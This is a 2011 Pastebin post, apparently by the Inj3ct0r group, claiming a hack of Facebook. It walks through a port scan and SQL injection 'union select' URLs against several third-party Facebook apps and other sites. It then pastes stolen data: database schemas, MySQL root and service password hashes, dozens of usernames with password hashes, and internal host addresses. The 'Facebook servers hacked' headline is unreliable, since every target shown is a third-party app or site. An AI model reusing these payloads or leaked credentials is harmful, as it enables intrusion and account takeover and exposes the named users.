API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Sep 4th, 2011
8,098
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 27.70 KB | None | 0 0
raw download clone embed print report
  1. =================================================================
  2. FaceBook's servers was hacked by Inj3ct0r team. Hack of the year!
  3. =================================================================
  4.  
  5.  
  6.  
  7. Original: http://inj3ct0r.com/exploits/11638
  8.  
  9. English translation
  10.  
  11. Inj3ct0r official website => Inj3ct0r.com
  12.  
  13. __ __ ___
  14. __ __ /'__`\ /\ \__ /'__`\
  15. /\_\ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __ ___ ___ ___ ___
  16. \/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ /'___\ / __`\ /' __` __`\
  17. \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ __/\ \__//\ \L\ \/\ \/\ \/\ \
  18. \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ /\_\ \____\ \____/\ \_\ \_\ \_\
  19. \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/_/\/____/\/___/ \/_/\/_/\/_/
  20. \ \____/
  21. \/___/
  22.  
  23.  
  24. [0x00] [Introduction]
  25. [0x01] [First impressions]
  26. [0x02] [Search for bugs]
  27. [0x03] [Inj3ct0r Crash Exploit]
  28. [0x04] [Conclusion]
  29. [0x05] [Greetz]
  30.  
  31.  
  32. If you want to know the Inj3ct0r group, read: http://inj3ct0r.com/exploits/9845
  33.  
  34.  
  35.  
  36. __ __ __
  37. /'__`\ /'__`\ /'__`\
  38. /\ \/\ \ __ _/\ \/\ \/\ \/\ \
  39. \ \ \ \ \/\ \/'\ \ \ \ \ \ \ \ \
  40. \ \ \_\ \/> </\ \ \_\ \ \ \_\ \
  41. \ \____//\_/\_\\ \____/\ \____/
  42. \/___/ \//\/_/ \/___/ \/___/
  43. [Introduction]
  44.  
  45.  
  46.  
  47.  
  48. + [En] => In this log file you will read a limited version of the information gathered and provided, since the most important
  49. parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system.
  50.  
  51. We did not change the main page, do not sell backup server does not delete files.
  52.  
  53. We have demonstrated the flaw in the system. Start =] ..
  54.  
  55.  
  56.  
  57. __ __ _
  58. /'__`\ /'__`\ /' \
  59. /\ \/\ \ __ _/\ \/\ \/\_, \
  60. \ \ \ \ \/\ \/'\ \ \ \ \/_/\ \
  61. \ \ \_\ \/> </\ \ \_\ \ \ \ \
  62. \ \____//\_/\_\\ \____/ \ \_\
  63. \/___/ \//\/_/ \/___/ \/_/
  64. [First impressions]
  65.  
  66.  
  67.  
  68.  
  69. At first glance, FaceBook well protected social network.
  70. Scanning FaceBook server did not give nothing interesting ... )
  71.  
  72. ..>
  73.  
  74. Initiating Parallel DNS resolution of 1 host.
  75. Completed Parallel DNS resolution of 1 host.
  76. Initiating SYN Stealth Scan
  77. Scanning facebook.com (69.63.181.11) [1000 ports]
  78. Discovered open port 443/tcp on 69.63.181.11
  79. Discovered open port 80/tcp on 69.63.181.11
  80. Completed SYN Stealth Scan 13.16s elapsed (1000 total ports)
  81. Initiating Service scan
  82. Scanning 2 services on facebook.com (69.63.181.11)
  83. Service scan Timing: About 50.00% done; ETC:
  84. Completed Service scan at 22:41, 104.15s elapsed (2 services on 1 host)
  85. NSE: Script scanning 69.63.181.11.
  86. NSE: Starting runlevel 1 (of 1) scan.
  87. Initiating NSE at 22:41
  88. Completed NSE at 22:41, 0.38s elapsed
  89. NSE: Script Scanning completed.
  90. Nmap scan report for facebook.com (69.63.181.11)
  91. Host is up (0.17s latency).
  92. Hostname facebook.com resolves to 4 IPs. Only scanned 69.63.181.11
  93. rDNS record for 69.63.181.11: www-10-01-snc2.facebook.com
  94. Not shown: 998 filtered ports
  95. PORT STATE SERVICE VERSION 80/tcp open http 443/tcp open ssl/https
  96.  
  97.  
  98. go ahead .. =]
  99.  
  100.  
  101. __ __ ___
  102. /'__`\ /'__`\ /'___`\
  103. /\ \/\ \ __ _/\ \/\ \/\_\ /\ \
  104. \ \ \ \ \/\ \/'\ \ \ \ \/_/// /__
  105. \ \ \_\ \/> </\ \ \_\ \ // /_\ \
  106. \ \____//\_/\_\\ \____//\______/
  107. \/___/ \//\/_/ \/___/ \/_____/
  108. [Search for bugs]
  109.  
  110.  
  111.  
  112. We use GoOgle.com
  113.  
  114. request: Facebook+Vulnerability [search]
  115.  
  116. We see a lot of different bug / exploits / etc ... Most see only XSS Vulnerabilities
  117.  
  118. but all this can be found by searching : http://inj3ct0r.com/search
  119.  
  120. All vulnerabilities are closed (Nothing does not work ... Let us once again to GoOgle.com
  121.  
  122. request: site:facebook.com WARNING error
  123.  
  124. =\ fuck...
  125. Let us not lose heart) Hackers are not looking for easy ways
  126.  
  127.  
  128. Visit Facebook.com
  129.  
  130. Let us search bugs in Web Apps.
  131.  
  132. http://www.facebook.com/robots.txt
  133.  
  134.  
  135. oooooooooooooooooooooooooooo
  136. User-agent: *
  137. Disallow: /ac.php
  138. Disallow: /ae.php
  139. Disallow: /album.php
  140. Disallow: /ap.php
  141. Disallow: /feeds/
  142. Disallow: /p.php
  143. Disallow: /photo_comments.php
  144. Disallow: /photo_search.php
  145. Disallow: /photos.php
  146.  
  147. User-agent: Slurp
  148. Disallow: /ac.php
  149. Disallow: /ae.php
  150. Disallow: /album.php
  151. Disallow: /ap.php
  152. Disallow: /feeds/
  153. Disallow: /p.php
  154. Disallow: /photo.php
  155. Disallow: /photo_comments.php
  156. Disallow: /photo_search.php
  157. Disallow: /photos.php
  158.  
  159. User-agent: msnbot
  160. Disallow: /ac.php
  161. Disallow: /ae.php
  162. Disallow: /album.php
  163. Disallow: /ap.php
  164. Disallow: /feeds/
  165. Disallow: /p.php
  166. Disallow: /photo.php
  167. Disallow: /photo_comments.php
  168. Disallow: /photo_search.php
  169. Disallow: /photos.php
  170.  
  171. # E-mail webmaster@facebook.com and alex@facebook.com if you're authorized to access these, but getting denied.
  172. Sitemap: http://www.facebook.com/sitemap.php
  173. 00000000000000000000000000000000
  174.  
  175. nothing interesting =\
  176.  
  177. http://apps.facebook.com/tvshowchat/
  178.  
  179. I looked closely, I noticed links
  180.  
  181. http://apps.facebook.com/tvshowchat/show.php?id=1 habit to check the variable vulnerability...
  182.  
  183. check:
  184.  
  185. http://apps.facebook.com/tvshowchat/show.php?id=inj3ct0r
  186.  
  187.  
  188. ooooooooooooooooooooooooooo
  189.  
  190. Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 28
  191.  
  192. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  193.  
  194. Warning: simplexml_load_string() [function.simplexml-load-string]: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  195.  
  196. Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  197.  
  198. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : SystemLiteral " or ' expected in /home/tomkincaid
  199.  
  200. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
  201.  
  202. Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 164
  203.  
  204. and other....
  205.  
  206. oooooooooooooooooooooooooooo
  207.  
  208.  
  209. O_o opsss! After sitting for a while, I realized that one of the servers is on MySql.
  210.  
  211. Writing exploits, I got the following:
  212. http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+@@version--+1
  213.  
  214.  
  215. ooooooooooooooooooooooooooo
  216.  
  217. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  218.  
  219. Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  220.  
  221. Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  222.  
  223. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  224.  
  225. Warning: simplexml_load_string() [function.simplexml-load-string]: </html> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  226.  
  227. 5.0.45-log <= ALERT!!!
  228.  
  229. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
  230.  
  231. and other....
  232.  
  233. oooooooooooooooooooooooooooo
  234.  
  235.  
  236. Database : adminclt_testsite
  237. Database User : adminclt_13@209.68.2.10
  238. MySQL Version : 5.0.67-log
  239.  
  240.  
  241. super = ] Now, we just can say that there is SQL Injection Vulnerability
  242.  
  243. http://apps.facebook.com/tvshowchat/show.php?id=[SQL Injection Vulnerability]
  244.  
  245. Now we know that there is MySql 5.0.45-log
  246.  
  247. Then let's write another exploit to display tables with information_schema.tables:
  248.  
  249. http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+information_schema.tables--+1
  250.  
  251.  
  252. oooooooooooooooooooooooooooo
  253.  
  254. Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
  255.  
  256. Warning: Invalid argument supplied for foreach() in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 38
  257.  
  258. Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from information_schema.tables-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/
  259.  
  260. 201 <= ALERT!!! 201 tables!
  261.  
  262. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
  263.  
  264. and other....
  265.  
  266. oooooooooooooooooooooooooooo
  267.  
  268. http://apps.facebook.com/observerfacebook/?p=challenges&id=[SQL INJ3ct0r]
  269.  
  270. Database : adminclt_testsite
  271. Database User : adminclt_13@209.68.2.10
  272. MySQL Version : 5.0.67-log
  273.  
  274.  
  275. 1) AdCode
  276. 2) AdTrack
  277. 3) Admin_DataStore
  278. 4) Admin_User
  279. 5) Challenges
  280. 6) ChallengesCompleted
  281. 7) Comments
  282. 8) ContactEmails
  283. 9) Content
  284. 10) ContentImages
  285. 11) FeaturedTemplate
  286. 12) FeaturedWidgets
  287. 13) Feeds
  288. 14) FolderLinks
  289. 15) Folders
  290. 16) ForumTopics
  291. 17) Log
  292. 18) LogDumps
  293. 19) Newswire
  294. 20) NotificationMessages
  295. 21) Notifications
  296. 22) Orders
  297. 23) OutboundMessages
  298. 24) Photos
  299. 25) Prizes
  300. 26) RawExtLinks
  301. 27) RawSessions
  302. 28) SessionLengths
  303. 29) Sites
  304. 30) Subscriptions
  305. 31) SurveyMonkeys
  306. 32) SystemStatus
  307. 33) Templates
  308. 34) User
  309. 35) UserBlogs
  310. 36) UserCollectives
  311. 37) UserInfo
  312. 38) UserInvites
  313. 39) Videos
  314. 40) WeeklyScores
  315. 41) Widgets
  316. 42) cronJobs
  317. 43) fbSessions
  318.  
  319. Admin_User
  320.  
  321. 1) id
  322. 2) name
  323. 3) email
  324. 4) password
  325. 5) userid
  326. 6) ncUid
  327. 7) level
  328.  
  329. User
  330.  
  331. 1) userid
  332. 2) ncUid
  333. 3) name
  334. 4) email
  335. 5) isAdmin
  336. 6) isBlocked
  337. 7) votePower
  338. 8) remoteStatus
  339. 9) isMember
  340. 10) isModerator
  341. 11) isSponsor
  342. 12) isEmailVerified
  343. 13) isResearcher
  344. 14) acceptRules
  345. 15) optInStudy
  346. 16) optInEmail
  347. 17) optInProfile
  348. 18) optInFeed
  349. 19) optInSMS
  350. 20) dateRegistered
  351. 21) eligibility
  352. 22) cachedPointTotal
  353. 23) cachedPointsEarned
  354. 24) cachedPointsEarnedThisWeek
  355. 25) cachedPointsEarnedLastWeek
  356. 26) cachedStoriesPosted
  357. 27) cachedCommentsPosted
  358. 28) userLevel
  359.  
  360. http://apps.facebook.com/ufundraise/fundraise.php?cid=[SQL INJ3CT0R]
  361.  
  362. Current Database : signalpa_fbmFundRraise
  363. Database User : signalpa_rockaja@localhost
  364. MySQL Version : 5.0.85-community
  365.  
  366. DATABASE
  367. 1) information_schema
  368. 2) signalpa_CelebrityPuzzle
  369. 3) signalpa_EBF
  370. 4) signalpa_appNotification
  371. 5) signalpa_appnetwork
  372. 6) signalpa_dailyscriptures
  373. 7) signalpa_ebayfeed
  374. 8) signalpa_fbmFundRraise
  375. 9) signalpa_fbmFundRraisebeta
  376. 10) signalpa_netcards
  377. 11) signalpa_paypal
  378. 12) signalpa_thepuzzle
  379.  
  380. signalpa_fbmFundRraise
  381. 1) Campaigns
  382. 2) Campaigns_Temp
  383. 3) FB_theme
  384. 4) IfundDollars
  385. 5) Languages
  386. 6) Payments
  387. 7) Paymentsoops
  388. 8) Supporters
  389. 9) Users
  390. 10) Withdrawals
  391. 11) invites
  392. 12) invites_copy
  393. 13) mp_passwords
  394. 14) payment_codes
  395. 15) txt_codes
  396. 16) valid_servers
  397. 17) weeklyBonus
  398.  
  399. Column: Users
  400.  
  401.  
  402. 1) id
  403. 2) name
  404. 3) email
  405. 4) mobile_no
  406. 5) address
  407. 6) country
  408. 7) password
  409. 8) organisation
  410. 9) date_created
  411. 10) date_updated
  412. 11) status
  413. 12) facebook_id
  414. 13) isFacebookFan
  415. 14) verify
  416. 15) paypalUse
  417. 16) paypalEmail
  418. 17) bacUse
  419. 18) bacAcc
  420. 19) bacName
  421. 20) bacLocation
  422. 21) bacCountry
  423. 22) bacIBAN
  424. 23) bacSort_code
  425. 24) current_rank
  426. 25) new_rank
  427. 26) cronjob
  428. 27) max_fundraise
  429.  
  430. Column: mp_passwords
  431.  
  432. 1) id
  433. 2) password
  434. 3) username
  435. 4) status
  436. 5) number
  437. 6) rc
  438. 7) referer
  439. 8) transID
  440. 9) currency
  441. 10) transType
  442. 11) amount
  443. 12) confirmed
  444. 13) date
  445.  
  446. signalpa_paypal
  447. 1) paypal_cart_info
  448. 2) paypal_payment_info
  449. 3) paypal_subscription_info
  450. [1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783:
  451. [2] Akwala: [2] b0c08027fd0f4deec8515c47125de023:
  452. [3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59:
  453.  
  454. Column: paypal_cart_info
  455. 1) txnid
  456. 2) itemname
  457. 3) itemnumber
  458. 4) os0
  459. 5) on0
  460. 6) os1
  461. 7) on1
  462. 8) quantity
  463. 9) invoice
  464. 10) custom
  465.  
  466. Column : paypal_payment_info
  467.  
  468. 1) firstname
  469. 2) lastname
  470. 3) buyer_email
  471. 4) street
  472. 5) city
  473. 6) state
  474. 7) zipcode
  475. 8) memo
  476. 9) itemname
  477. 10) itemnumber
  478. 11) os0
  479. 12) on0
  480. 13) os1
  481. 14) on1
  482. 15) quantity
  483. 16) paymentdate
  484. 17) paymenttype
  485. 18) txnid
  486. 19) mc_gross
  487. 20) mc_fee
  488. 21) paymentstatus
  489. 22) pendingreason
  490. 23) txntype
  491. 24) tax
  492. 25) mc_currency
  493. 26) reasoncode
  494. 27) custom
  495. 28) country
  496. 29) datecreation
  497.  
  498.  
  499. http://apps.facebook.com/tvshowchat/show.php?id=[SQL INJ3CT0R]
  500.  
  501.  
  502. Current Database : tv
  503. Database User : tomkincaid@ps5008.dreamhost.com
  504. MySQL Version : 5.0.45-log
  505.  
  506. DATABASES
  507.  
  508.  
  509. 1) information_schema
  510. 2) astro
  511. 3) candukincaid
  512. 4) cemeteries
  513. 5) churchwpdb
  514. 6) countdownapp
  515. 7) crush
  516. 8) dare
  517. 9) friendiq
  518. 10) giants
  519. 11) hookup
  520. 12) jauntlet
  521. 13) loccus
  522. 14) luciacanduwp
  523. 15) maps
  524. 16) martisor
  525. 17) mediax
  526. 18) mostlikely
  527. 19) music
  528. 20) pimpfriends
  529. 21) plans
  530. 22) politicsapp
  531. 23) postergifts
  532. 24) posters2
  533. 25) projectbasecamp
  534. 26) pwnfriends
  535. 27) quiz
  536. 28) seeall
  537. 29) send
  538. 30) supporter
  539. 31) swapu
  540. 32) tomsapps
  541. 33) travelbug
  542.  
  543. tab.send
  544.  
  545.  
  546. 1) app
  547. 2) item
  548. 3) itemforuser
  549. 4) neverblue
  550. 5) user
  551.  
  552. Columns
  553.  
  554. user(12454)
  555.  
  556. 1) userid
  557. 2) siteid
  558. 3) appkey
  559. 4) session
  560. 5) points
  561. 6) added
  562. 7) removed
  563.  
  564. Tab. candukincaid
  565.  
  566. 1) wp_comments
  567. 2) wp_links
  568. 3) wp_options
  569. 4) wp_post****
  570. 5) wp_posts
  571. 6) wp_px_albumPhotos
  572. 7) wp_px_albums
  573. 8) wp_px_galleries
  574. 9) wp_px_photos
  575. 10) wp_px_plugins
  576. 11) wp_term_relationships
  577. 12) wp_term_taxonomy
  578. 13) wp_terms
  579. 14) wp_user****
  580. 15) wp_users
  581.  
  582.  
  583. Column wp_users
  584.  
  585.  
  586. 1) ID
  587. 2) user_login
  588. 3) user_pass
  589. 4) user_nicename
  590. 5) user_email
  591. 6) user_url
  592. 7) user_registered
  593. 8) user_activation_key
  594. 9) user_status
  595. 10) display_name
  596.  
  597. etc...
  598.  
  599. http://apps.facebook.com/fluff/fluffbook.php?id=[SQL Inj3ct0r]
  600.  
  601. > ~ inj3ct0r_facebook_exploit [ENTER]
  602.  
  603. root:*368C08021F7260A991A9D8121B7D7808C99BBB8A
  604. slave_user:*38E277D5CA4EAA7E9A73F8EF80813D7B5859E407
  605. muu:*74A45B921A1A918B18AE9B137396E5A67E006262
  606. monitor:*1840AE2C95804EC69321D1EE33AADFA249817034
  607. maatkit:*9FA5157314A2CF7448A34DA070B5D44E977A1220
  608.  
  609. http://apps.facebook.com/snowago/area.php?areaid=[SQL Inj3ct0r]
  610.  
  611. Database: affinispac_fb
  612. User: affinispac_fb@localhost
  613. Version: 5.0.67-community
  614.  
  615. http://www.chinesezodiachoroscope.com/facebook/index1.php?user_id=[SQL Inj3ct0r]
  616.  
  617. >plucky@localhost : facebook : 4.0.13-log
  618.  
  619. etc... =]
  620.  
  621.  
  622. Next xD
  623.  
  624. Database: thetvdb
  625. User: thetvdb@localhost
  626. Version: 5.0.51a-24-log
  627.  
  628.  
  629. [Database]: thetvdb
  630.  
  631.  
  632. [1]aka_seriesname
  633. [2]apiusers
  634. [3]banners
  635. [4]deletions
  636. [5]genres
  637. [6]imgstatus
  638. [7]languages
  639. [8]mirrors
  640. [9]networks
  641. [10]ratings
  642. [11]runtimes
  643. [12]seriesactors
  644. [13]seriesupdates
  645. [14]translation_episodename
  646. [15]translation_episodeoverview
  647. [16]translation_labels
  648. [17]translation_seriesname
  649. [18]translation_seriesoverview
  650. [19]tvepisodes
  651. [20]tvseasons
  652. [21]tvseries
  653. [22]user_episodes
  654. [23]users
  655.  
  656. users:
  657.  
  658. id,username,userpass,emailaddress,ipaddress,userlevel,languageid,favorites,
  659. favorites_displaymode,bannerlimit,banneragreement,active,uniqueid,
  660. lastupdatedby_admin,mirrorupdate
  661.  
  662.  
  663. [userpass]
  664.  
  665. [1] *E92C1AB432D14ACA4D6618A9DFC22810363B114E:
  666. [2] *C62726955C4492A6A0CB7319C3928DACEAC4C66D:
  667. [3] *887C5DA43E5ACEE73689956A4497C0EDA956E790:
  668. [4] *57D6D9BF9F1962C9A006BB451FAF21693624391E:
  669. [5] *51121B1DC695FF11A3AEF514AAA0C487611FD98B:
  670. [6] 3d801aa532c1cec3ee82d87a99fdf63f
  671.  
  672. [Database]: wiki
  673.  
  674.  
  675. [24]archive
  676. [25]categorylinks
  677. [26]externallinks
  678. [27]filearchive
  679. [28]hitcounter
  680. [29]image
  681. [30]imagelinks
  682. [31]interwiki
  683. [32]ipblocks
  684. [33]job
  685. [34]langlinks
  686. [35]logging
  687. [36]math
  688. [37]objectcache
  689. [38]oldimage
  690. [39]page
  691. [40]page_restrictions
  692. [41]pagelinks
  693. [42]querycache
  694. [43]querycache_info
  695. [44]querycachetwo
  696. [45]recentchanges
  697. [46]redirect
  698. [47]revision
  699. [48]searchindex
  700. [49]site_stats
  701. [50]templatelinks
  702. [51]text
  703. [52]trackbacks
  704. [53]transcache
  705. [54]user
  706. [55]user_groups
  707. [56]user_newtalk
  708. [57]watchlist
  709.  
  710. user:
  711.  
  712. user_id,user_name,user_real_name,user_password,user_newpassword,user_newpass_time,
  713. user_email,user_options,user_touched,user_token,user_email_authenticated,user_email_token,
  714. user_email_token_expires,user_registration,user_editcount
  715.  
  716. ['user_name'] : ['user_pass']
  717.  
  718.  
  719. [1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783:
  720. [2] Akwala: [2] b0c08027fd0f4deec8515c47125de023:
  721. [3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59:
  722. [4] AleX: [4] afbb46ebf8c46bfb1f286df87d577f87:
  723. [5] Arucard: [5] e94f2b46cbfc681d2346424d7e0e3b3f:
  724. [6] AxesDenyd: [6] a998f782d92a8af1c683e6a0e36404e4:
  725. [7] Badubo: [7] 5a8920177dbf9abddefe4ff49ebbc67c:
  726. [8] Bjarkimg: [8] fd6a9eef25ead144df9592087bb4aec5:
  727. [9] BrandonB1218: [9] 62cda59cc492df4f1b1dd4d1365b5ff5:
  728. [10] Bsudbury: [10] 827d07956629c37855f3518374821872:
  729. [11] Burchard: [11] 4dc05fcbbf5850d27e627d5c4278c4cf:
  730. [12] Carla: [12] f41991b4dfd3b494c39751225e1faa29:
  731. [13] Click170: [13] 9c38b5f4673372a806f38a4dade456cc:
  732. [14] Coco: [14] f6770367b7ca8261a25ea797c24761aa:
  733. [15] Corte: [15] 9add39f338de37ce1cf52eaed38b09b2:
  734. [16] Crippler: [16] b3d947a82648b2707130f176204cbbfd:
  735. [17] Dbkungfu: [17] 0bcb65441f47097f85af79c793c74b95:
  736. [18] Deuce911: [18] 0220c76e24b82236675500f1e536a4be:
  737. [19] DigitallyBorn: [19] 3e57b721280c35ba66f2a151e19c620b:
  738. [20] Divervan10: [20] 1ad65386e69de0896f49c7d0fbaa0cba:
  739. [21] Donovan: [21] 03e4e11728c5f16fc936cb4c1d803029:
  740. [22] Drkshenronx: [22] ea0b8397ad79d255195780e367ccf026:
  741. [23] Emigrating12: [23] c45db536613d53252d00be3dc81cbde0:
  742. [24] Emphatic: [24] 3195961b90ea2fe0ac6d12efac8fef19:
  743. [25] Eta: [25] f083e5e3fd924342f77e4111df8788e1:
  744. [26] Farrism: [26] efef4efa85d73ca0247052687ca9683b:
  745. [27] Fiven: [27] 5f6dd4fde7d37c19d1e267618f55d35f:
  746. [28] FloVi: [28] 918f77c2a0fe807b3cff8816b8aed8ee:
  747. [29] Fritigern: [29] 6a16028b432de68363a20912c31bca03:
  748. [30] Furby: [30] 117088a3b9b504ce23c7926c8691fced:
  749. [31] Gerph: [31] 294d0c1541c7d892962cb51d540753c1:
  750. [32] Hallvar: [32] 4a5da5086b99a7d2f8aef976d364d07c:
  751. [33] Happyfrog: [33] 189a598dbdf27734a47c4731c099712d:
  752. [34] Hjeffrey: [34] 9b6daf5130c8c1a329a1e6ceff31d448:
  753. [35] Hsvjez: [35] fef14c536557ec3b0727246e6f57fadb:
  754. [36] Jase81: [36] 9e4c45874be6735b6432e5f060660a46:
  755. [37] Jcnetdev: [37] 88a2dc251c777d48189501a79e3d3ffa:
  756. [38] Jcpmcdonald: [38] 083968e4c21e6f3ff47c3fefad7c3ff7:
  757. [39] Jobba: [39] 699cb250cc53224bf0220d4c8f513a27:
  758. [40] Jschek: [40] 9bcf4c5f58764dc4c812b78276d5e412:
  759. [41] Juliani1024: [41] c5ea2a208e8e24bd0e3696be6de3bd07:
  760. [42] Kakosi: [42] b747252b62d95163a083acf54141bfc6:
  761. [43] KelleyCook: [43] b929c4422b9ea29845d1bf46fde7e765:
  762. [44] Ken brueck: [44] 1fd5e065ac6587cf351dee24f79def76:
  763. [45] Kennykixx: [45] 2a4a9abc742f3508fa37f37e30ed480b:
  764. [46] Kermtfrg: [46] cbaef6f6fa9175d419af3395f25bd814:
  765. [47] Keydon: [47] e9e984ed67c7e8a67f3406c5506293ec:
  766. [48] Kraigspear: [48] ac70640d36b6c9a3fcff3f66687fd3d5:
  767. [49] Krisg1984: [49] c78ea770e941c369aa3463c9a74d2f1d:
  768. [50] Leecole: [50] 4b3b865528e582b6a4dfc9430aec1ea8:
  769. [51] Livemac: [51] 0e36e0b0866b8911216c464fe8440319:
  770. [52] Markscore: [52] 5710cbdd3de7e28c7c93eb8e48e266a9:
  771. [53] Mcmanuss8: [53] 6262c8e4c7a5bb9d49743c5659d3cc40:
  772. [54] Mcoit: [54] 980a1ea1d9fd960208d004fe7ce928fb:
  773. [55] Mhale62: [55] df318f477b0c4a3e4f9f3e1ced62f607:
  774. [56] Mjh ca: [56] 07223e31ea0a8a617934081475d9ad52:
  775. [57] Mreuring: [57] 42472c97f021f725cea7670b078795a1:
  776. [58] Nathanlburns: [58] b7e16c89320be1b9860dcb83a082881a:
  777. [59] Nekocha: [59] 490c01eea35370bca2c78dce7ab633da:
  778. [60] Ngoring: [60] a19430b436a03fdfda8818f8cf486580:
  779. [61] Nighthawk92: [61] e8c8cf0eeaec4841c14ede3bcac7e6bb:
  780. [62] Null dev: [62] 4e744d982a173d0e1439787da27f022c:
  781. [63] Nunovi: [63] 7325e3df990caadddf2423cf96272fed:
  782. [64] Obsidianpanther: [64] 53fd2e06ca60a0640cdc617681ace453:
  783. [65] PLUCKYHD: [65] 2ac1aa8f8e5341788c9ca7555cc10714:
  784. [66] Plambert: [66] 9333604b2eefdcc01debb843373ae492:
  785. [67] Polargeek: [67] d0394680e24f75e7dae4e0ca23756161:
  786. [68] QyleCoop: [68] af49b70536b2ec2439095947bab36b43:
  787. [69] Ramsay: [69] 317192baea92e857e27c96e80c9f6874:
  788. [70] Scrooge666: [70] 8498d4d9c8de0300f0b8b3bc789d6731:
  789. [71] SeaLawyer: [71] 14dd3e79c6f486319e39ef694cd61a2d:
  790. [72] Searlea: [72] 058beaa0d231d457136015119da5aa34:
  791. [73] Serberus: [73] ff80d6419f6be5d76dd404fdb256eb3c:
  792. [74] Skillzzz: [74] 5f012a10f4eeddacfd2c495f64dbd975:
  793. [75] Smakkie: [75] 7143a09106678ec593eec82fcf3e66fd:
  794. [76] Smoko: [76] d9a1360bfcdedb3c6f48a37442d58dd8:
  795. [77] Smuto: [77] 20ec74ff3d72d42f7593002b0d28a540:
  796. [78] Stdly: [78] 4d7b92f616ffe6b420180e859bf245ba:
  797. [79] Swiip: [79] 120cc4e935a2c57763709392c5eb6fdf:
  798. [80] Szsori: [80] e7fb98c3d405dcc89314996b9c5c6cb2:
  799. [81] THe-BiNk: [81] 49e6e431cccf6a77bf6dafa0c96a361a:
  800. [82] TheStapler: [82] 7278b0168b8cfb38e64d2b6abe6991fc:
  801. [83] Todu: [83] 2173ff53b1fb2bbe3fd49d3d17b6f09f:
  802. [84] TommyD: [84] ca62c603dffc337b87a662fa904caa51:
  803. [85] TrocdRonel: [85] 318698c02f2f6ea7fef38e17cdaa1ac5:
  804. [86] Trol1234: [86] ce07cb60f64f2119a657a1427edc359e:
  805. [87] Trolik123456: [87] d392ceb168469aca3b21e1aaeb00f301:
  806. [88] Trolik23512: [88] dd16749110a800511459fa4ed655b36c:
  807. [89] Trololo23512: [89] 3d508eed899c625389167d2216fae370:
  808. [90] Weaverslodge: [90] c2c22a2c65b487915911c1d7f66b85e8:
  809. [91] Woodstock123: [91] ba4d45f8c7e9574dd839993a2001d5cd:
  810. [92] Wwarby: [92] 04409a510d208e737fa00cd97c712740:
  811. [93] Yabba: [93] 4b1febeed49cd185a8efbb8a61f68d74:
  812. [94] Zombiigraet33456904: [94] 028785be8488292e8b88137b5fd2c128:
  813. [95] Zombiigraet33456906: [95] 4820e4653d77bb3ccab9e7ed25155a5b:
  814. [96] Zubbizub1212: [96] ea2e5c44c48ce8f880a0f1627e599868:
  815.  
  816. ---------------------------------------------------------------------------------------------------------------------------------------------------
  817.  
  818. read /etc/hosts
  819.  
  820. 127.0.0.1 localhost localhost.localdomain
  821. 192.168.1.167 140696-db2.flufffriends.com 140696-db2
  822. 192.168.1.166 140695-db1.flufffriends.com 140695-db1
  823. 192.168.1.165 140694-web2.flufffriends.com 140694-web2
  824. 192.168.1.164 140693-web1.flufffriends.com 140693-web1
  825. 69.63.176.141 api.facebook.com
  826. 208.116.17.80 peanutlabs.com
  827.  
  828. ----------------------------------
  829.  
  830. /etc/my.cnf
  831.  
  832. #SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1
  833.  
  834. log-bin=/var/lib/mysqllogs/bin-log
  835.  
